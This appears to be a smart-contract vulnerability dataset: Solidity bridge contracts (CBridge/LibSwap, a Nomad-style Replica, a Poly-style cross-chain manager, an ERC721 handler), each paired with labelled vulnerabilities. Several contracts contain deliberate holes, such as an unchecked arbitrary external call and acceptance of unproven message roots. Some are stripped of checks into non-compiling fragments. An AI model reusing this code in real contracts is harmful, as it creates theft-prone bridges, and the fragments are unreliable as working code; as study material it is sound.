90                 LibSwap.swap(_lifiData.transactionId, _swapData[i], invokeSwap);
91             }

92             uint256 _postSwapBalance = LibAsset.getOwnBalance(_cBridgeData.token) - _fromTokenBalance;          

93             _cBridgeData.amount = _postSwapBalance;
94         } else {
95             uint256 _fromBalance = address(this).balance;

96             // Swap
97             for (uint8 i; i < _swapData.length; i++) {
98                 invokeSwap = true; 
99                 LibSwap.swap(_lifiData.transactionId, _swapData[i],  invokeSwap);
100             }

101             uint256 _postSwapBalance = address(this).balance - _fromBalance;

102             _cBridgeData.amount = _postSwapBalance;
103         }

104         _startBridge(_cBridgeData);

105         emit LiFiTransferStarted(
106             _lifiData.transactionId,
107             _lifiData.integrator,
108             _lifiData.referrer,
109             _lifiData.sendingAssetId,
110             _lifiData.receivingAssetId,
111             _lifiData.receiver,
112             _lifiData.amount,
113             _lifiData.destinationChainId,
114             block.timestamp
115         );
116     }

117     /* ========== Internal Functions ========== */

118     /*
119      * @dev Conatains the business logic for the bridge via CBridge
120      * @param _cBridgeData data specific to CBridge
121      */
122     function _startBridge(CBridgeData memory _cBridgeData) internal {
123         Storage storage s = getStorage();
124         address bridge = _bridge();

125         // Do CBridge stuff      
126         if (LibAsset.isNativeAsset(_cBridgeData.token)) {
127             ICBridge(bridge).sendNative(
128                 _cBridgeData.receiver,
129                 _cBridgeData.amount,
130                 _cBridgeData.dstChainId,
131                 _cBridgeData.nonce,
132                 _cBridgeData.maxSlippage
133             );
134         } else {
135             // Give CBridge approval to bridge tokens
136             LibAsset.approveERC20(IERC20(_cBridgeData.token), bridge, _cBridgeData.amount);
137             // solhint-disable check-send-result
138             ICBridge(bridge).send(
139                 _cBridgeData.receiver,
140                 _cBridgeData.token,
141                 _cBridgeData.amount,
142                 _cBridgeData.dstChainId,
143                 _cBridgeData.nonce,
144                 _cBridgeData.maxSlippage
145             );
146         }
147     }

148     /*
149      * @dev Public view function for the CBridge router address
150      * @returns the router address
151      */
152     function _bridge() internal view returns (address) {
153         Storage storage s = getStorage();
154         return s.cBridge;
155     }

156     /**
157      * @dev fetch local storage
158      */
159     function getStorage() internal pure returns (Storage storage s) {
160         bytes32 namespace = NAMESPACE;
161         // solhint-disable-next-line no-inline-assembly
162         assembly {
163             s.slot := namespace
164         }
165     }
166 }
167 // SPDX-License-Identifier: MIT
168 pragma solidity ^0.8.7;

169 import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
170 import { LibAsset } from "./LibAsset.sol";
171 import { LibUtil } from "./LibUtil.sol";

172 library LibSwap {
173     uint256 private constant MAX_INT = 2**256 - 1;

174     struct SwapData {
175         address callTo;
176         address approveTo;
177         address sendingAssetId;
178         address receivingAssetId;
179         uint256 fromAmount;
180         bytes callData;
181     }

182     event AssetSwapped(
183         bytes32 transactionId,
184         address dex,
185         address fromAssetId,
186         address toAssetId,
187         uint256 fromAmount,
188         uint256 toAmount,
189         uint256 timestamp
190     );

191     function swap(bytes32 transactionId, SwapData calldata _swapData, bool invokeSwap) internal {       
192         uint256 fromAmount = _swapData.fromAmount;
193         uint256 toAmount = LibAsset.getOwnBalance(_swapData.receivingAssetId);
194         address fromAssetId = _swapData.sendingAssetId;
195         if (!LibAsset.isNativeAsset(fromAssetId) && LibAsset.getOwnBalance(fromAssetId) < fromAmount) {
196             LibAsset.transferFromERC20(_swapData.sendingAssetId, msg.sender, address(this), fromAmount);
197         }

198         if (!LibAsset.isNativeAsset(fromAssetId)) {
199             LibAsset.approveERC20(IERC20(fromAssetId), _swapData.approveTo, fromAmount);
200         }

201         // solhint-disable-next-line avoid-low-level-calls
202         (bool success, bytes memory res) = _swapData.callTo.call{ value: msg.value }(_swapData.callData);
203         if (!success) {
204             string memory reason = LibUtil.getRevertMsg(res);
205             revert(reason);
206         }

207         toAmount = LibAsset.getOwnBalance(_swapData.receivingAssetId) - toAmount;
208         emit AssetSwapped(
209             transactionId,
210             _swapData.callTo,
211             _swapData.sendingAssetId,
212             _swapData.receivingAssetId,
213             fromAmount,
214             toAmount,
215             block.timestamp
216         );
217     }
218 }
What are the vulnerabilities in the contract?
atomicity violation
business logic flaw
integer overflow/underflow
<end of text>
1 // SPDX-License-Identifier: MIT OR Apache-2.0
2 pragma solidity >=0.6.11;

3  */
4 contract Replica {
 
5     /**
6      * @notice Emitted when message is processed
7      * @param messageHash Hash of message that failed to process
8      * @param success TRUE if the call was executed successfully, FALSE if the call reverted
9      * @param returnData the return data from the external call
10      */
11     event Process(
12         bytes32 indexed messageHash,
13         bool indexed success,
14         bytes indexed returnData
15     );

   

16     function initialize(
17         uint32 _remoteDomain,
18         address _updater,
19         bytes32 _committedRoot,
20         uint256 _optimisticSeconds
21     ) public initializer {
22         __NomadBase_initialize(_updater);
23         // set storage variables
24         entered = 1;
25         remoteDomain = _remoteDomain;
26         committedRoot = _committedRoot;     
27         confirmAt[_committedRoot] = 1;
28         optimisticSeconds = _optimisticSeconds;
29         emit SetOptimisticTimeout(_optimisticSeconds);
30     }

31     // ============ External Functions ============

32     /**
33      * @notice Called by external agent. Submits the signed update's new root,
34      * marks root's allowable confirmation time, and emits an `Update` event.
35      * @dev Reverts if update doesn't build off latest committedRoot
36      * or if signature is invalid.
37      * @param _oldRoot Old merkle root
38      * @param _newRoot New merkle root
39      * @param _signature Updater's signature on `_oldRoot` and `_newRoot`
40      */
41     function update(
42         bytes32 _oldRoot,
43         bytes32 _newRoot,
44         bytes memory _signature
45     ) external notFailed {
46         // ensure that update is building off the last submitted root
47         require(_oldRoot == committedRoot, "not current update");
48         // validate updater signature
49         require(
50             _isUpdaterSignature(_oldRoot, _newRoot, _signature),
51             "!updater sig"
52         );
53         // Hook for future use
54         _beforeUpdate();
55         // set the new root's confirmation timer
56         confirmAt[_newRoot] = block.timestamp + optimisticSeconds;
57         // update committedRoot
58         committedRoot = _newRoot;
59         emit Update(remoteDomain, _oldRoot, _newRoot, _signature);
60     }

61     /**
62      * @notice First attempts to prove the validity of provided formatted
63      * `message`. If the message is successfully proven, then tries to process
64      * message.
65      * @dev Reverts if `prove` call returns false
66      * @param _message Formatted message (refer to NomadBase.sol Message library)
67      * @param _proof Merkle proof of inclusion for message's leaf
68      * @param _index Index of leaf in home's merkle tree
69      */
70     function proveAndProcess(
71         bytes memory _message,
72         bytes32[32] calldata _proof,
73         uint256 _index
74     ) external {
75         require(prove(keccak256(_message), _proof, _index), "!prove");
76         process(_message);
77     }

78     /**
79      * @notice Given formatted message, attempts to dispatch
80      * message payload to end recipient.
81      * @dev Recipient must implement a `handle` method (refer to IMessageRecipient.sol)
82      * Reverts if formatted message's destination domain is not the Replica's domain,
83      * if message has not been proven,
84      * or if not enough gas is provided for the dispatch transaction.
85      * @param _message Formatted message
86      * @return _success TRUE iff dispatch transaction succeeded
87      */
88     function process(bytes memory _message) public returns (bool _success) {
89         bytes29 _m = _message.ref(0);
90         // ensure message was meant for this domain
91         require(_m.destination() == localDomain, "!destination");
92         // ensure message has been proven
93         bytes32 _messageHash = _m.keccak();
94         require(messages[_messageHash] == MessageStatus.Proven, "!proven");
95         // check re-entrancy guard
96         require(entered == 1, "!reentrant");
97         entered = 0;
98         // update message status as processed
99         messages[_messageHash] = MessageStatus.Processed;
100         // A call running out of gas TYPICALLY errors the whole tx. We want to
101         // a) ensure the call has a sufficient amount of gas to make a
102         //    meaningful state change.
103         // b) ensure that if the subcall runs out of gas, that the tx as a whole
104         //    does not revert (i.e. we still mark the message processed)
105         // To do this, we require that we have enough gas to process
106         // and still return. We then delegate only the minimum processing gas.
107         require(gasleft() >= PROCESS_GAS + RESERVE_GAS, "!gas");
108         // get the message recipient
109         address _recipient = _m.recipientAddress();
110         // set up for assembly call
111         uint256 _toCopy;
112         uint256 _maxCopy = 256;
113         uint256 _gas = PROCESS_GAS;
114         // allocate memory for returndata
115         bytes memory _returnData = new bytes(_maxCopy);
116         bytes memory _calldata = abi.encodeWithSignature(
117             "handle(uint32,uint32,bytes32,bytes)",
118             _m.origin(),
119             _m.nonce(),
120             _m.sender(),
121             _m.body().clone()
122         );
123         // dispatch message to recipient
124         // by assembly calling "handle" function
125         // we call via assembly to avoid memcopying a very large returndata
126         // returned by a malicious contract
127         assembly {
128             _success := call(
129                 _gas, // gas
130                 _recipient, // recipient
131                 0, // ether value
132                 add(_calldata, 0x20), // inloc
133                 mload(_calldata), // inlen
134                 0, // outloc
135                 0 // outlen
136             )
137             // limit our copy to 256 bytes
138             _toCopy := returndatasize()
139             if gt(_toCopy, _maxCopy) {
140                 _toCopy := _maxCopy
141             }
142             // Store the length of the copied bytes
143             mstore(_returnData, _toCopy)
144             // copy the bytes from returndata[0:_toCopy]
145             returndatacopy(add(_returnData, 0x20), 0, _toCopy)
146         }
147         // emit process results
148         emit Process(_messageHash, _success, _returnData);
149         // reset re-entrancy guard
150         entered = 1;
151     }

152     // ============ External Owner Functions ============

153     /**
154      * @notice Set optimistic timeout period for new roots
155      * @dev Only callable by owner (Governance)
156      * @param _optimisticSeconds New optimistic timeout period
157      */
158     function setOptimisticTimeout(uint256 _optimisticSeconds)
159         external
160         onlyOwner
161     {
162         optimisticSeconds = _optimisticSeconds;
163         emit SetOptimisticTimeout(_optimisticSeconds);
164     }

165     /**
166      * @notice Set Updater role
167      * @dev MUST ensure that all roots signed by previous Updater have
168      * been relayed before calling. Only callable by owner (Governance)
169      * @param _updater New Updater
170      */
171     function setUpdater(address _updater) external onlyOwner {
172         _setUpdater(_updater);
173     }

174     /**
175      * @notice Set confirmAt for a given root
176      * @dev To be used if in the case that fraud is proven
177      * and roots need to be deleted / added. Only callable by owner (Governance)
178      * @param _root The root for which to modify confirm time
179      * @param _confirmAt The new confirmation time. Set to 0 to "delete" a root.
180      */
181     function setConfirmation(bytes32 _root, uint256 _confirmAt)
182         external
183         onlyOwner
184     {
185         uint256 _previousConfirmAt = confirmAt[_root];
186         confirmAt[_root] = _confirmAt;
187         emit SetConfirmation(_root, _previousConfirmAt, _confirmAt);
188     }

189     // ============ Public Functions ============

190     /**
191      * @notice Check that the root has been submitted
192      * and that the optimistic timeout period has expired,
193      * meaning the root can be processed
194      * @param _root the Merkle root, submitted in an update, to check
195      * @return TRUE iff root has been submitted & timeout has expired
196      */
197     function acceptableRoot(bytes32 _root) public view returns (bool) {
198         uint256 _time = confirmAt[_root];
199         if (_time == 0) {
200             return false;
201         }
202         return block.timestamp >= _time;
203     }

204     /**
205      * @notice Attempts to prove the validity of message given its leaf, the
206      * merkle proof of inclusion for the leaf, and the index of the leaf.
207      * @dev Reverts if message's MessageStatus != None (i.e. if message was
208      * already proven or processed)
209      * @dev For convenience, we allow proving against any previous root.
210      * This means that witnesses never need to be updated for the new root
211      * @param _leaf Leaf of message to prove
212      * @param _proof Merkle proof of inclusion for leaf
213      * @param _index Index of leaf in home's merkle tree
214      * @return Returns true if proof was valid and `prove` call succeeded
215      **/
216     function prove(
217         bytes32 _leaf,
218         bytes32[32] calldata _proof,
219         uint256 _index
220     ) public returns (bool) {
221         // ensure that message has not been proven or processed
222         require(messages[_leaf] == MessageStatus.None, "!MessageStatus.None");
223         // calculate the expected root based on the proof
224         bytes32 _calculatedRoot = MerkleLib.branchRoot(_leaf, _proof, _index);
225         // if the root is valid, change status to Proven
226         if (acceptableRoot(_calculatedRoot)) {
227             messages[_leaf] = MessageStatus.Proven;
228             return true;
229         }
230         return false;
231     }

232     /**
233      * @notice Hash of Home domain concatenated with "NOMAD"
234      */
235     function homeDomainHash() public view override returns (bytes32) {
236         return _homeDomainHash(remoteDomain);
237     }

238     // ============ Internal Functions ============

239     /**
240      * @notice Moves the contract into failed state
241      * @dev Called when a Double Update is submitted
242      */
243     function _fail() internal override {
244         _setFailed();
245     }

246     /// @notice Hook for potential future use
247     // solhint-disable-next-line no-empty-blocks
248     function _beforeUpdate() internal {}
249 }
What are the vulnerabilities in the contract?
ID uniqueness violation
inconsistent state update
<end of text>
1 pragma solidity ^0.5.0;

2 import "./../../../libs/math/SafeMath.sol";
3 import "./../../../libs/common/ZeroCopySource.sol";
4 import "./../../../libs/common/ZeroCopySink.sol";
5 import "./../../../libs/utils/Utils.sol";
6 import "./../upgrade/UpgradableECCM.sol";
7 import "./../libs/EthCrossChainUtils.sol";
8 import "./../interface/IEthCrossChainManager.sol";
9 import "./../interface/IEthCrossChainData.sol";
10 contract EthCrossChainManager is IEthCrossChainManager, UpgradableECCM {
11     using SafeMath for uint256;

12     event InitGenesisBlockEvent(uint256 height, bytes rawHeader);
13     event ChangeBookKeeperEvent(uint256 height, bytes rawHeader);
14     event CrossChainEvent(address indexed sender, bytes txId, address proxyOrAssetContract, uint64 toChainId, bytes toContract, bytes rawdata);
15     event VerifyHeaderAndExecuteTxEvent(uint64 fromChainID, bytes toContract, bytes crossChainTxHash, bytes fromChainTxHash);
16     constructor(address _eccd) UpgradableECCM(_eccd) public {}
    
17     /* @notice              sync Poly chain genesis block header to smart contrat
18     *  @dev                 this function can only be called once, nextbookkeeper of rawHeader can't be empty
19     *  @param rawHeader     Poly chain genesis block raw header or raw Header including switching consensus peers info
20     *  @return              true or false
21     */
22     function initGenesisBlock(bytes memory rawHeader, bytes memory pubKeyList) whenNotPaused public returns(bool) {
23         // Load Ethereum cross chain data contract
24         IEthCrossChainData eccd = IEthCrossChainData(EthCrossChainDataAddress);
        
25         // Make sure the contract has not been initialized before
26         require(eccd.getCurEpochConPubKeyBytes().length == 0, "EthCrossChainData contract has already been initialized!");
        
27         // Parse header and convit the public keys into nextBookKeeper and compare it with header.nextBookKeeper to verify the validity of signature
28         ECCUtils.Header memory header = ECCUtils.deserializeHeader(rawHeader);
29         (bytes20 nextBookKeeper, address[] memory keepers) = ECCUtils.verifyPubkey(pubKeyList);
        
30         // Record current epoch start height and public keys (by storing them in address format)
             
        
31         // Fire the event
32         emit InitGenesisBlockEvent(header.height, rawHeader);
33         return true;
34     }
    
35     /* @notice              change Poly chain consensus book keeper
36     *  @param rawHeader     Poly chain change book keeper block raw header
37     *  @param pubKeyList    Poly chain consensus nodes public key list
38     *  @param sigList       Poly chain consensus nodes signature list
39     *  @return              true or false
40     */
41     function changeBookKeeper(bytes memory rawHeader, bytes memory pubKeyList, bytes memory sigList) whenNotPaused public returns(bool) {
42         // Load Ethereum cross chain data contract
43         ECCUtils.Header memory header = ECCUtils.deserializeHeader(rawHeader);
44         IEthCrossChainData eccd = IEthCrossChainData(EthCrossChainDataAddress);
        
45         // Make sure rawHeader.height is higher than recorded current epoch start height
46         uint64 curEpochStartHeight = eccd.getCurEpochStartHeight();
47         require(header.height > curEpochStartHeight, "The height of header is lower than current epoch start height!");
        
48         // Ensure the rawHeader is the key header including info of switching consensus peers by containing non-empty nextBookKeeper field
        
49         // Verify signature of rawHeader comes from pubKeyList
50         address[] memory polyChainBKs = ECCUtils.deserializeKeepers(eccd.getCurEpochConPubKeyBytes());
51         uint n = polyChainBKs.length;      
        
52         // Convert pubKeyList into ethereum address format and make sure the compound address from the converted ethereum addresses
53         // equals passed in header.nextBooker
54         (bytes20 nextBookKeeper, address[] memory keepers) = ECCUtils.verifyPubkey(pubKeyList);       
        
55         // update current epoch start height of Poly chain and current epoch consensus peers book keepers addresses
              
        
56         // Fire the change book keeper event
57         emit ChangeBookKeeperEvent(header.height, rawHeader);
58         return true;
59     }


60     /* @notice              ERC20 token cross chain to other blockchain.
61     *                       this function push tx event to blockchain
62     *  @param toChainId     Target chain id
63     *  @param toContract    Target smart contract address in target block chain
64     *  @param txData        Transaction data for target chain, include to_address, amount
65     *  @return              true or false
66     */
67     function crossChain(uint64 toChainId, bytes calldata toContract, bytes calldata method, bytes calldata txData) whenNotPaused external returns (bool) {
68         // Load Ethereum cross chain data contract
69         IEthCrossChainData eccd = IEthCrossChainData(EthCrossChainDataAddress);
        
70         // To help differentiate two txs, the ethTxHashIndex is increasing automatically
71         uint256 txHashIndex = eccd.getEthTxHashIndex();
        
72         // Convert the uint256 into bytes
73         bytes memory paramTxHash = Utils.uint256ToBytes(txHashIndex);
        
74         // Construct the makeTxParam, and put the hash info storage, to help provide proof of tx existence
75         bytes memory rawParam = abi.encodePacked(ZeroCopySink.WriteVarBytes(paramTxHash),
76             ZeroCopySink.WriteVarBytes(abi.encodePacked(sha256(abi.encodePacked(address(this), paramTxHash)))),
77             ZeroCopySink.WriteVarBytes(Utils.addressToBytes(msg.sender)),
78             ZeroCopySink.WriteUint64(toChainId),
79             ZeroCopySink.WriteVarBytes(toContract),
80             ZeroCopySink.WriteVarBytes(method),
81             ZeroCopySink.WriteVarBytes(txData)
82         );
        
83         // Must save it in the storage to be included in the proof to be verified.
               
84         // Fire the cross chain event denoting there is a cross chain request from Ethereum network to other public chains through Poly chain network
85         emit CrossChainEvent(tx.origin, paramTxHash, msg.sender, toChainId, toContract, rawParam);
86         return true;
87     }
88     /* @notice              Verify Poly chain header and proof, execute the cross chain tx from Poly chain to Ethereum
89     *  @param proof         Poly chain tx merkle proof
90     *  @param rawHeader     The header containing crossStateRoot to verify the above tx merkle proof
91     *  @param headerProof   The header merkle proof used to verify rawHeader
92     *  @param curRawHeader  Any header in current epoch consensus of Poly chain
93     *  @param headerSig     The coverted signature veriable for solidity derived from Poly chain consensus nodes' signature
94     *                       used to verify the validity of curRawHeader
95     *  @return              true or false
96     */
97     function verifyHeaderAndExecuteTx(bytes memory proof, bytes memory rawHeader, bytes memory headerProof, bytes memory curRawHeader,bytes memory headerSig) whenNotPaused public returns (bool){
98         ECCUtils.Header memory header = ECCUtils.deserializeHeader(rawHeader);
99         // Load ehereum cross chain data contract
100         IEthCrossChainData eccd = IEthCrossChainData(EthCrossChainDataAddress);
        
101         // Get stored consensus public key bytes of current poly chain epoch and deserialize Poly chain consensus public key bytes to address[]
102         address[] memory polyChainBKs = ECCUtils.deserializeKeepers(eccd.getCurEpochConPubKeyBytes());

103         uint256 curEpochStartHeight = eccd.getCurEpochStartHeight();

104         uint n = polyChainBKs.length;
105         if (header.height >= curEpochStartHeight) {
106             // It's enough to verify rawHeader signature          
107         } else {
108             // We need to verify the signature of curHeader           
109            _;
110             // Then use curHeader.StateRoot and headerProof to verify rawHeader.CrossStateRoot
111             ECCUtils.Header memory curHeader = ECCUtils.deserializeHeader(curRawHeader);
112             bytes memory proveValue = ECCUtils.merkleProve(headerProof, curHeader.blockRoot);          
113         }
        
114         // Through rawHeader.CrossStatesRoot, the toMerkleValue or cross chain msg can be verified and parsed from proof
115         bytes memory toMerkleValueBs = ECCUtils.merkleProve(proof, header.crossStatesRoot);
        
116         // Parse the toMerkleValue struct and make sure the tx has not been processed, then mark this tx as processed
117         ECCUtils.ToMerkleValue memory toMerkleValue = ECCUtils.deserializeMerkleValue(toMerkleValueBs);
        
118         // Ethereum ChainId is 2, we need to check the transaction is for Ethereum network       
        
119         // Obtain the targeting contract, so that Ethereum cross chain manager contract can trigger the executation of cross chain tx on Ethereum side
120         address toContract = Utils.bytesToAddress(toMerkleValue.makeTxParam.toContract);
        
121         //TODO: check this part to make sure we commit the next line when doing local net UT test
       
122         // Fire the cross chain event denoting the executation of cross chain tx is successful,
123         // and this tx is coming from other public chains to current Ethereum network
124         emit VerifyHeaderAndExecuteTxEvent(toMerkleValue.fromChainID, toMerkleValue.makeTxParam.toContract, toMerkleValue.txHash, toMerkleValue.makeTxParam.txHash);

125         return true;
126     }
    
127     /* @notice                  Dynamically invoke the targeting contract, and trigger executation of cross chain tx on Ethereum side
128     *  @param _toContract       The targeting contract that will be invoked by the Ethereum Cross Chain Manager contract
129     *  @param _method           At which method will be invoked within the targeting contract
130     *  @param _args             The parameter that will be passed into the targeting contract
131     *  @param _fromContractAddr From chain smart contract address
132     *  @param _fromChainId      Indicate from which chain current cross chain tx comes 
133     *  @return                  true or false
134     */
135     function _executeCrossChainTx(address _toContract, bytes memory _method, bytes memory _args, bytes memory _fromContractAddr, uint64 _fromChainId) internal returns (bool){
136         // Ensure the targeting contract gonna be invoked is indeed a contract rather than a normal account address
137         require(Utils.isContract(_toContract), "The passed in address is not a contract!");
138         bytes memory returnData;
139         bool success;
140         // The returnData will be bytes32, the last byte must be 01;
141         (success, returnData) = _toContract.call(abi.encodePacked(bytes4(keccak256(abi.encodePacked(_method, "(bytes,bytes,uint64)"))), abi.encode(_args, _fromContractAddr, _fromChainId)));
        
142         // Ensure the executation is successful       
        
143         // Ensure the returned value is true
144         require(returnData.length != 0, "No return value from business contract!");
145         (bool res,) = ZeroCopySource.NextBool(returnData, 31);
             
146         return true;
147     }
148 }
What are the vulnerabilities in the contract?
incorrect visibility/ownership
ID uniqueness violation
business logic flaw
inconsistent state update
<end of text>
1 // SPDX-License-Identifier: LGPL-3.0-only
2 pragma solidity 0.6.12;
3 pragma experimental ABIEncoderV2;

4 import "../interfaces/IDepositExecute.sol";
5 import "./HandlerHelpers.sol";
6 import "../ERC721Safe.sol";
7 import "@openzeppelin/contracts/introspection/ERC165Checker.sol";
8 import "@openzeppelin/contracts/token/ERC721/IERC721Metadata.sol";


9 /**
10     @title Handles ERC721 deposits and deposit executions.
11     @author ChainSafe Systems.
12     @notice This contract is intended to be used with the Bridge contract.
13  */
14 contract ERC721Handler is IDepositExecute, HandlerHelpers, ERC721Safe {
15     using ERC165Checker for address;

16     bytes4 private constant _INTERFACE_ERC721_METADATA = 0x5b5e139f;

17     /**
18         @param bridgeAddress Contract address of previously deployed Bridge.
19      */
20     constructor(
21         address bridgeAddress
22     ) public HandlerHelpers(bridgeAddress) {
23     }

24     /**
25         @notice A deposit is initiatied by making a deposit in the Bridge contract.
26         @param resourceID ResourceID used to find address of token to be used for deposit.
27         @param depositer Address of account making the deposit in the Bridge contract.
28         @param data Consists of {tokenID} padded to 32 bytes.
29         @notice Data passed into the function should be constructed as follows:
30         tokenID                                     uint256    bytes    0  - 32
31         @notice If the corresponding {tokenAddress} for the parsed {resourceID} supports {_INTERFACE_ERC721_METADATA},
32         then {metaData} will be set according to the {tokenURI} method in the token contract.
33         @dev Depending if the corresponding {tokenAddress} for the parsed {resourceID} is
34         marked true in {_burnList}, deposited tokens will be burned, if not, they will be locked.
35         @return metaData : the deposited token metadata acquired by calling a {tokenURI} method in the token contract.
36      */
37     function deposit(bytes32    resourceID,
38                     address     depositer,
39                     bytes       calldata data
40                     ) external override onlyBridge returns (bytes memory metaData) {
41         uint         tokenID;

42         (tokenID) = abi.decode(data, (uint));

43         address tokenAddress = _resourceIDToTokenContractAddress[resourceID];
     
44         // Check if the contract supports metadata, fetch it if it does
45         if (tokenAddress.supportsInterface(_INTERFACE_ERC721_METADATA)) {
46             IERC721Metadata erc721 = IERC721Metadata(tokenAddress);
47             metaData = bytes(erc721.tokenURI(tokenID));
48         }

49         if (_burnList[tokenAddress]) {
50             burnERC721(tokenAddress, tokenID);
51         } else {
52             lockERC721(tokenAddress, depositer, address(this), tokenID);
53         }
54     }

55     /**
56         @notice Proposal execution should be initiated when a proposal is finalized in the Bridge contract.
57         by a relayer on the deposit's destination chain.
58         @param data Consists of {tokenID}, {resourceID}, {lenDestinationRecipientAddress},
59         {destinationRecipientAddress}, {lenMeta}, and {metaData} all padded to 32 bytes.
60         @notice Data passed into the function should be constructed as follows:
61         tokenID                                     uint256    bytes    0  - 32
62         destinationRecipientAddress     length      uint256    bytes    32 - 64
63         destinationRecipientAddress                   bytes    bytes    64 - (64 + len(destinationRecipientAddress))
64         metadata                        length      uint256    bytes    (64 + len(destinationRecipientAddress)) - (64 + len(destinationRecipientAddress) + 32)
65         metadata                                      bytes    bytes    (64 + len(destinationRecipientAddress) + 32) - END
66      */
67     function executeProposal(bytes32 resourceID, bytes calldata data) external override onlyBridge {
68         uint         tokenID;
69         uint         lenDestinationRecipientAddress;
70         bytes memory destinationRecipientAddress;
71         uint         offsetMetaData;
72         uint         lenMetaData;
73         bytes memory metaData;

74         (tokenID, lenDestinationRecipientAddress) = abi.decode(data, (uint, uint));
75         offsetMetaData = 64 + lenDestinationRecipientAddress;
76         destinationRecipientAddress = bytes(data[64:offsetMetaData]);
77         lenMetaData = abi.decode(data[offsetMetaData:], (uint));
78         metaData = bytes(data[offsetMetaData + 32:offsetMetaData + 32 + lenMetaData]);

79         bytes20 recipientAddress;

80         assembly {
81             recipientAddress := mload(add(destinationRecipientAddress, 0x20))
82         }

83         address tokenAddress = _resourceIDToTokenContractAddress[resourceID];      
84         if (_burnList[tokenAddress]) {
85             mintERC721(tokenAddress, address(recipientAddress), tokenID, metaData);
86         } else {
87             releaseERC721(tokenAddress, address(this), address(recipientAddress), tokenID);
88         }
89     }

90     /**
91         @notice Used to manually release ERC721 tokens from ERC721Safe.
92         @param tokenAddress Address of token contract to release.
93         @param recipient Address to release token to.
94         @param tokenID The ERC721 token ID to release.
95      */
96     function withdraw(address tokenAddress, address recipient, uint tokenID) external override onlyBridge {
97         releaseERC721(tokenAddress, address(this), recipient, tokenID);
98     }
99 }
What are the vulnerabilities in the contract?
ID uniqueness violation
inconsistent state update
<end of text>
1 // SPDX-License-Identifier: LGPL-3.0-only
2 pragma solidity 0.6.12;
3 pragma experimental ABIEncoderV2;

4 import "../interfaces/IDepositExecute.sol";
5 import "./HandlerHelpers.sol";
6 import "../ERC721Safe.sol";
7 import "@openzeppelin/contracts/introspection/ERC165Checker.sol";
8 import "@openzeppelin/contracts/token/ERC721/IERC721Metadata.sol";


9 /**
10     @title Handles ERC721 deposits and deposit executions.
11     @author ChainSafe Systems.
12     @notice This contract is intended to be used with the Bridge contract.
13  */
14 contract ERC721Handler is IDepositExecute, HandlerHelpers, ERC721Safe {
15     using ERC165Checker for address;

16     bytes4 private constant _INTERFACE_ERC721_METADATA = 0x5b5e139f;

17     /**
18         @param bridgeAddress Contract address of previously deployed Bridge.
19      */
20     constructor(
21         address bridgeAddress
22     ) public HandlerHelpers(bridgeAddress) {
23     }

24     /**
25         @notice A deposit is initiatied by making a deposit in the Bridge contract.
26         @param resourceID ResourceID used to find address of token to be used for deposit.
27         @param depositer Address of account making the deposit in the Bridge contract.
28         @param data Consists of {tokenID} padded to 32 bytes.
29         @notice Data passed into the function should be constructed as follows:
30         tokenID                                     uint256    bytes    0  - 32
31         @notice If the corresponding {tokenAddress} for the parsed {resourceID} supports {_INTERFACE_ERC721_METADATA},
32         then {metaData} will be set according to the {tokenURI} method in the token contract.
33         @dev Depending if the corresponding {tokenAddress} for the parsed {resourceID} is
34         marked true in {_burnList}, deposited tokens will be burned, if not, they will be locked.
35         @return metaData : the deposited token metadata acquired by calling a {tokenURI} method in the token contract.
36      */
37     function deposit(bytes32    resourceID,
38                     address     depositer,
39                     bytes       calldata data
40                     ) external override onlyBridge returns (bytes memory metaData) {
41         uint         tokenID;

42         (tokenID) = abi.decode(data, (uint));

43         address tokenAddress = _resourceIDToTokenContractAddress[resourceID];      
44         // Check if the contract supports metadata, fetch it if it does
45         if (tokenAddress.supportsInterface(_INTERFACE_ERC721_METADATA)) {
46             IERC721Metadata erc721 = IERC721Metadata(tokenAddress);
47             metaData = bytes(erc721.tokenURI(tokenID));
48         }

49         if (_burnList[tokenAddress]) {
50             burnERC721(tokenAddress, tokenID);
51         } else {
52             lockERC721(tokenAddress, depositer, address(this), tokenID);
53         }
54     }

55     /**
56         @notice Proposal execution should be initiated when a proposal is finalized in the Bridge contract.
57         by a relayer on the deposit's destination chain.
58         @param data Consists of {tokenID}, {resourceID}, {lenDestinationRecipientAddress},
59         {destinationRecipientAddress}, {lenMeta}, and {metaData} all padded to 32 bytes.
60         @notice Data passed into the function should be constructed as follows:
61         tokenID                                     uint256    bytes    0  - 32
62         destinationRecipientAddress     length      uint256    bytes    32 - 64
63         destinationRecipientAddress                   bytes    bytes    64 - (64 + len(destinationRecipientAddress))
64         metadata                        length      uint256    bytes    (64 + len(destinationRecipientAddress)) - (64 + len(destinationRecipientAddress) + 32)
65         metadata                                      bytes    bytes    (64 + len(destinationRecipientAddress) + 32) - END
66      */
67     function executeProposal(bytes32 resourceID, bytes calldata data) external override onlyBridge {
68         uint         tokenID;
69         uint         lenDestinationRecipientAddress;
70         bytes memory destinationRecipientAddress;
71         uint         offsetMetaData;
72         uint         lenMetaData;
73         bytes memory metaData;

74         (tokenID, lenDestinationRecipientAddress) = abi.decode(data, (uint, uint));
75         offsetMetaData = 64 + lenDestinationRecipientAddress;
76         destinationRecipientAddress = bytes(data[64:offsetMetaData]);
77         lenMetaData = abi.decode(data[offsetMetaData:], (uint));
78         metaData = bytes(data[offsetMetaData + 32:offsetMetaData + 32 + lenMetaData]);

79         bytes20 recipientAddress;

80         assembly {
81             recipientAddress := mload(add(destinationRecipientAddress, 0x20))
82         }

83         address tokenAddress = _resourceIDToTokenContractAddress[resourceID];      

84         if (_burnList[tokenAddress]) {
85             mintERC721(tokenAddress, address(recipientAddress), tokenID, metaData);
86         } else {
87             releaseERC721(tokenAddress, address(this), address(recipientAddress), tokenID);
88         }
89     }

90     /**
91         @notice Used to manually release ERC721 tokens from ERC721Safe.
92         @param tokenAddress Address of token contract to release.
93         @param recipient Address to release token to.
94         @param tokenID The ERC721 token ID to release.
95      */
96     function withdraw(address tokenAddress, address recipient, uint tokenID) external override onlyBridge {
97         releaseERC721(tokenAddress, address(this), recipient, tokenID);
98     }
99 }
What are the vulnerabilities in the contract?

<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract A {
3     uint x;
4     constructor (uint a) public {x= a;}
5 }

6 contract B is A {
7     constructor (uint a) A(a) public {x++;}
8 }

9 contract C is A, B {
10 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 // Possible bug:
3 // In this test, ctor D is NOT called twice -
4 // Only ctor C is called
5 // compare with ConstructorChaining2_fail.sol

6 contract D {
7         uint a;
8     constructor (uint x) public { a = x; }
9 }

10 contract B is D {
